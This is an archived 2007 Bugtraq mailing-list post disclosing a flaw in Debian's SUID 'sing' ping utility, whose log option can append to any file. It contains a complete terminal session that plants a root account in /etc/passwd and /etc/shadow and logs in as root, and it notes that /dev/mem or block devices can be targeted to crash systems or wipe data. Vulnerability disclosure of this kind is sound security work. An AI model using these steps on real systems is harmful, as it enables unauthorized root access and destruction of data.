lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <1196670746.5175.15.camel@gat3way.globul.bg>
Date: Mon, 03 Dec 2007 08:32:26 +0000
From: Milen Rangelov <mrangelov@...bul.bg>
To: bugtraq@...urityfocus.com
Subject: sing (debian) vunlerability?

Hello,

The sing utility (Send Nasty ICMP Garbage) is a ping replacement that
allows sending ICMP packets with spoofed source and custom ICMP
types/codes (http://sourceforge.net/projects/sing).

The debian package provides sing as a suid binary (actually,
the sid distribution asks the user whether he'd like it installed suid,
I'm not 100% sure, but in etch, it installs it suid, anyway, should
check).

The sing program has the "-L" option to log its output into a log file.
Due to lack of file ownership checking, any file could be overwriten
(more precisely - appended) with its log output.

I tried to play with making the output usable for some privileges
escalation purposes, but failed initially (sing escapes some bad input,
ehm).

However, it's still possible for any user to crash the system or destroy
block devices' data (provided that the binary is installed SUID of
course). Exploiting that is trivial, just give /dev/mem or any block
device as a log file.

However, later on, I decided to try it again to gain root privileges
and it occured to be quite trivial. 

Here is an example session:

gat3way@...3way:~$ cat hah

hack:x:0:0:/tmp:/bin/sh

n
gat3way@...3way:~$ cat hah1

hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::

n
gat3way@...3way:~$ grep hack /etc/passwd
gat3way@...3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@...3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@...3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@...3way:~$ ssh hack@...alhost
hack@...alhost's password:
..
root@...3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@...3way:~#



After all, that's not a huge problem, cause quite a few users install
sing AFAIK. But it's a very easily exploited vulnerability OTOH and
leads to a superuser privillege escalation, system crash or destroying
data. 

 
Regards,

Milen Rangelov

P.S sorry if that mail is duplicated, I had some problems with my mail
server and had to resend that mail.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ